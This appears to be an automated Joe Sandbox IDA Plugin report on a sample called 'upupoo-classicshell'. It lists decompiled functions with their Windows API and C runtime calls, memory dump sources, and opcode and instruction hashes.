                                                                                                              • Instruction ID: 52f29ad692e8f77cbbcc393072647de7299b1848e637edec226d95a640d7eae1
                                                                                                              • Opcode Fuzzy Hash: 259002e11f90dda2798d6b0440bff852f3a75d94c9f529e8b29147c60574de7a
                                                                                                              • Instruction Fuzzy Hash: 63A18972A1061A8FDB00CFECC9C0799B7F4FB497A4F564629DA55AF242D732E800CB91
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,1000A55C,?,?,00000000), ref: 1000A365
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,1000A55C,?,?,00000000,?,?,?), ref: 1000A3EB
                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,1000A55C,?,?,00000000,?), ref: 1000A4E5
                                                                                                              • __freea.LIBCMT ref: 1000A4F2
                                                                                                                • Part of subcall function 10007DA2: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,1000A5BB,00000001,00000000,?,10009255,00000001,00000004,00000000,00000001,?,?,10007A89), ref: 10007DD4
                                                                                                              • __freea.LIBCMT ref: 1000A4FB
                                                                                                              • __freea.LIBCMT ref: 1000A520
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide__freea$AllocHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3147120248-0
                                                                                                              • Opcode ID: 75faa58704443a65e114674e4f19ec9264a70c7a7f1dc76a712b73558287d04c
                                                                                                              • Instruction ID: 347cb34858b265d0a76abfe4a5d63416f6ba46da913f435053f86f0fa170bd29
                                                                                                              • Opcode Fuzzy Hash: 75faa58704443a65e114674e4f19ec9264a70c7a7f1dc76a712b73558287d04c
                                                                                                              • Instruction Fuzzy Hash: 0351CF76610216AFFB15CF64CC85EAF37A9EB866D0B114329FD04DA148EB74EDC0D6A0
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,6E0B4C20,?,?,00000003), ref: 6E0B4A29
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,?,?,6E0B4C20,?,?,00000003,?), ref: 6E0B4AAF
                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000003,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6E0B4BA9
                                                                                                              • __freea.LIBCMT ref: 6E0B4BB6
                                                                                                                • Part of subcall function 6E0B0F23: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6E0B6A46,00000001,00000000,?,6E0B3B91,00000001,00000004,00000000,00000001,?,?,6E0B0869), ref: 6E0B0F55
                                                                                                              • __freea.LIBCMT ref: 6E0B4BBF
                                                                                                              • __freea.LIBCMT ref: 6E0B4BE4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide__freea$AllocHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3147120248-0
                                                                                                              • Opcode ID: 91667d5b901e93a2eec2902f796d4528edc6942f979d1750bce99f033b23270e
                                                                                                              • Instruction ID: 1527a4f8399e4bbc4237d415855f827ce71e8f02ce074030e7634a85b92716ad
                                                                                                              • Opcode Fuzzy Hash: 91667d5b901e93a2eec2902f796d4528edc6942f979d1750bce99f033b23270e
                                                                                                              • Instruction Fuzzy Hash: 6751BC72A10216BFEB258EE4CC91FAB77E9FB44794B104668EE14D7140EB36DE4186A0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                               • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                              • String ID:
                                                                                                              • API String ID: 3160817290-0
                                                                                                              • Opcode ID: 5b153be5527101a79d58557ca9c73faddc413b6f7d812d4d626c0dc657012eaf
                                                                                                              • Instruction ID: ff87b2143ae6c1074eaeb520f825daac95a71dcd6feda4857c1337ed75f1108c
                                                                                                              • Opcode Fuzzy Hash: 5b153be5527101a79d58557ca9c73faddc413b6f7d812d4d626c0dc657012eaf
                                                                                                              • Instruction Fuzzy Hash: BBF0C839944A1267F212D3349C4AF2B25A9FFC5AE1B220129F698D329FEF349B025355
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(00000008,?,6E0B3FFA,?,?,?,?,?,?,?,?,?,?,6E0A9806,?), ref: 6E0B163F
                                                                                                              • _free.LIBCMT ref: 6E0B1672
                                                                                                              • _free.LIBCMT ref: 6E0B169A
                                                                                                              • SetLastError.KERNEL32(00000000,6E0B0C25,00000016,6E0B3214), ref: 6E0B16A7
                                                                                                              • SetLastError.KERNEL32(00000000,6E0B0C25,00000016,6E0B3214), ref: 6E0B16B3
                                                                                                              • _abort.LIBCMT ref: 6E0B16B9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                               • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                              • String ID:
                                                                                                              • API String ID: 3160817290-0
                                                                                                              • Opcode ID: a44e3140f421e5140d5c3cda6169684437b6008298f6fcb430c2f55b7957f706
                                                                                                              • Instruction ID: 2700452414fef13744d50343e6838f75010817b79ab90d706241e7f97fb1288e
                                                                                                              • Opcode Fuzzy Hash: a44e3140f421e5140d5c3cda6169684437b6008298f6fcb430c2f55b7957f706
                                                                                                              • Instruction Fuzzy Hash: 19F0A931518A02ABC65112F59C58F9F25ADBFC27A5B150515F928E7185FF338C464138
                                                                                                              APIs
                                                                                                              • __CreateFrameInfo.LIBCMT ref: 00C283F2
                                                                                                                • Part of subcall function 00C253B6: __getptd.LIBCMT ref: 00C253C4
                                                                                                                • Part of subcall function 00C253B6: __getptd.LIBCMT ref: 00C253D2
                                                                                                              • __getptd.LIBCMT ref: 00C283FC
                                                                                                                • Part of subcall function 00C27633: __getptd_noexit.LIBCMT ref: 00C27636
                                                                                                                • Part of subcall function 00C27633: __amsg_exit.LIBCMT ref: 00C27643
                                                                                                              • __getptd.LIBCMT ref: 00C2840A
                                                                                                              • __getptd.LIBCMT ref: 00C28418
                                                                                                              • __getptd.LIBCMT ref: 00C28423
                                                                                                              • _CallCatchBlock2.LIBCMT ref: 00C28449
                                                                                                                • Part of subcall function 00C2545B: __CallSettingFrame@12.LIBCMT ref: 00C254A7
                                                                                                                • Part of subcall function 00C284F0: __getptd.LIBCMT ref: 00C284FF
                                                                                                                • Part of subcall function 00C284F0: __getptd.LIBCMT ref: 00C2850D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                               • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                               • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                               • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                               • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 1602911419-0
                                                                                                              • Opcode ID: 09d2bb303a7e49745c86157a3387973164374807afa54a6b04c348c8d7ec984e
                                                                                                              • Instruction ID: d3bd7d1d4df220e3139981a1b3dec97185d93648a532b359e4da2d1646632a49
                                                                                                              • Opcode Fuzzy Hash: 09d2bb303a7e49745c86157a3387973164374807afa54a6b04c348c8d7ec984e
                                                                                                              • Instruction Fuzzy Hash: 1711D7B1C04219DFDF00EFA5E446BAE7BB1FF04314F148169F814A7692DB789A15AF90
                                                                                                              APIs
                                                                                                              • GetClassInfoExW.USER32(00000000,?,?), ref: 00C21B5C
                                                                                                              • GetClassInfoExW.USER32(?,?,?), ref: 00C21B6F
                                                                                                              • LoadCursorW.USER32(?,?), ref: 00C21BB1
                                                                                                                • Part of subcall function 00C213B0: EnterCriticalSection.KERNEL32 ref: 00C213B6
                                                                                                                • Part of subcall function 00C21470: LeaveCriticalSection.KERNEL32 ref: 00C2147C
                                                                                                              • GetClassInfoExW.USER32(?,00000000,?), ref: 00C21BF9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                               • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                               • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                               • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                               • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClassInfo$CriticalSection$CursorEnterLeaveLoad
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 158815643-4108050209
                                                                                                              • Opcode ID: a9fb0991870440e5418c9a64b9291a9fbeae0e497afd6004d1c3ae10e25d7466
                                                                                                              • Instruction ID: 9be52296e50076bc2e1c3b71990111818437a8908971ec669ef2f813c945ce18
                                                                                                              • Opcode Fuzzy Hash: a9fb0991870440e5418c9a64b9291a9fbeae0e497afd6004d1c3ae10e25d7466
                                                                                                              • Instruction Fuzzy Hash: 175166B56043599FDB24CF14E840BAAB7E4FB98754F044A1DFD5883680EB35EA44CB92
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(63E47454), ref: 6E09F927
                                                                                                              • GetProcAddress.KERNEL32(00000000,-0B2380EC), ref: 6E09F92F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                               • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: _$4$_$4$_$4
                                                                                                              • API String ID: 1646373207-3055943180
                                                                                                              • Opcode ID: 767621f7ad4767ffde64dd3872ee5ff43a756ac7caf6da44eeb002cc07c5076d
                                                                                                              • Instruction ID: f723c243c971c25db23fd4090d388b64872a419fb549a502f081faf4d94af675
                                                                                                              • Opcode Fuzzy Hash: 767621f7ad4767ffde64dd3872ee5ff43a756ac7caf6da44eeb002cc07c5076d
                                                                                                              • Instruction Fuzzy Hash: DC41AB7161C5004FCF54DDBD888832DBBE9A74A3547B4842AF580C7302E678DC85BB51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                               • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Q>,$Q>,$Q>,
                                                                                                              • API String ID: 0-1249747301
                                                                                                              • Opcode ID: d46a08d303a72b2e8f42dbfdfc241f8a4d48ccc3e80a1aa99969c853be1e2f18
                                                                                                              • Instruction ID: 4196b8055687042f8eafff93eec4166d26cec92bcf168e162fbe893354b7c44d
                                                                                                              • Opcode Fuzzy Hash: d46a08d303a72b2e8f42dbfdfc241f8a4d48ccc3e80a1aa99969c853be1e2f18
                                                                                                              • Instruction Fuzzy Hash: 0E415AB170C9488FCF1489FE48847597BF2EB4A3107D48929D7A4C7347D274DC498BA2
                                                                                                              APIs
                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 10005CEB
                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 10005D65
                                                                                                                • Part of subcall function 1000D6F0: __FindPESection.LIBCMT ref: 1000D749
                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 10005DD9
                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 10005E04
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                               • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CookiesLocalValidate$CurrentFindImageNonwritableSection
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 1685366865-1018135373
                                                                                                              • Opcode ID: 9553568ea9ceda8bca7d9fe165bfdc0c2d6db0410be3a296f176b3528819398f
                                                                                                              • Instruction ID: 7dc808ba71b93887189a654e5a1d14b145ba9dad9eea2133575003d35e1b2c22
                                                                                                              • Opcode Fuzzy Hash: 9553568ea9ceda8bca7d9fe165bfdc0c2d6db0410be3a296f176b3528819398f
                                                                                                              • Instruction Fuzzy Hash: 2C41D434D002099FEF10DF58CC88AAFBBB5EF442A5F208157E8145B35ADB32EA05CB91
                                                                                                              APIs
                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 6E0AB38B
                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6E0AB405
                                                                                                                • Part of subcall function 6E0B9270: __FindPESection.LIBCMT ref: 6E0B92C9
                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 6E0AB479
                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 6E0AB4A4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                               • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CookiesLocalValidate$CurrentFindImageNonwritableSection
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 1685366865-1018135373
                                                                                                              • Opcode ID: 8f91d8ada840b789df74fdffe71a0f6e3ba625329238890e4e62180e49f71edf
                                                                                                              • Instruction ID: c3884dfed04523ade2f4919d99dbb66d2bf250e5666e1150f1bac312e90fd24e
                                                                                                              • Opcode Fuzzy Hash: 8f91d8ada840b789df74fdffe71a0f6e3ba625329238890e4e62180e49f71edf
                                                                                                              • Instruction Fuzzy Hash: 2741813090020DABCB00CFDDC890BDEBBF9EF45318F148559EA18AB25AD7329A15CF91
                                                                                                              APIs
                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6E0B9B60
                                                                                                              • new.LIBCMT ref: 6E0B9BCC
                                                                                                              • __ExceptionPtr::__ExceptionPtr.LIBCMT ref: 6E0B9BE4
                                                                                                              • __ExceptionPtr::__ExceptionPtr.LIBCMT ref: 6E0B9C17
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Exception$Ptr::__$H_prolog3_catch
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 2421427270-1018135373
                                                                                                              • Opcode ID: a5c301ce95bb78266a1d94ef48d9366040fe172f3a0e6f6d9b99f463010d8183
                                                                                                              • Instruction ID: 0be8f4f161532b4ece854538804c04ab428959d8ce6939b110a7ce92203a61e5
                                                                                                              • Opcode Fuzzy Hash: a5c301ce95bb78266a1d94ef48d9366040fe172f3a0e6f6d9b99f463010d8183
                                                                                                              • Instruction Fuzzy Hash: FE311A70D052599FDB05CFE8C6A0BDDBBF8BF29304F544459E815BB281DB768A05CBA0
                                                                                                              APIs
                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,100074CD,?,?,1000746D,?,100148D8,0000000C,100075A0,00000000,00000000), ref: 1000753C
                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 1000754F
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,100074CD,?,?,1000746D,?,100148D8,0000000C,100075A0,00000000,00000000,00000001,10003DC6), ref: 10007572
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                              • Opcode ID: f9d03282619bcdbcf4f796ca44d1777906c68be5a4441127bae86c73c4e60a76
                                                                                                              • Instruction ID: a6cc373632386b046271831ad89df3b5ae4c2ed718ad2c343cc66be689ef572f
                                                                                                              • Opcode Fuzzy Hash: f9d03282619bcdbcf4f796ca44d1777906c68be5a4441127bae86c73c4e60a76
                                                                                                              • Instruction Fuzzy Hash: 3EF04F35900218BBEB01DBA0CC49BEE7FB8EF043D2F40406CF905A2665CB749A40DA91
                                                                                                              APIs
                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6E0B02AD,?,?,6E0B024D,?,6E0C3D90,0000000C,6E0B0380,00000000,00000000), ref: 6E0B031C
                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E0B032F
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,6E0B02AD,?,?,6E0B024D,?,6E0C3D90,0000000C,6E0B0380,00000000,00000000,00000001,6E0A884C), ref: 6E0B0352
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                              • Opcode ID: c743eb1daad5e2bfad11c823ed0ee9adb83f451354e86e10c3305e09120f3024
                                                                                                              • Instruction ID: 36e6fd94ca4777cde6efcdf9c9f139f961930d8e7a4d1a83d52b1f6b2489eeda
                                                                                                              • Opcode Fuzzy Hash: c743eb1daad5e2bfad11c823ed0ee9adb83f451354e86e10c3305e09120f3024
                                                                                                              • Instruction Fuzzy Hash: 36F03C31910509EBCB519BE0C85CBEEBBB8FF45B51F404065E909A6250DB769940CE90
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 00C28133
                                                                                                                • Part of subcall function 00C27633: __getptd_noexit.LIBCMT ref: 00C27636
                                                                                                                • Part of subcall function 00C27633: __amsg_exit.LIBCMT ref: 00C27643
                                                                                                              • __getptd.LIBCMT ref: 00C28144
                                                                                                              • __getptd.LIBCMT ref: 00C28152
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                              • String ID: MOC$csm
                                                                                                              • API String ID: 803148776-1389381023
                                                                                                              • Opcode ID: 80bc5694e9b82ccb911c1e2def009eca148bb7412d7462a82685ef422902e9d1
                                                                                                              • Instruction ID: e1de8f04da175dbdba31d1d6c9c31d1080f4a8c29de75890b514975bdce74d80
                                                                                                              • Opcode Fuzzy Hash: 80bc5694e9b82ccb911c1e2def009eca148bb7412d7462a82685ef422902e9d1
                                                                                                              • Instruction Fuzzy Hash: D8E04F325051248FD710AB69E08AB2833A5FB94714F1905A2F40CC7BA3CB38DD55E982
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free
                                                                                                              • String ID:
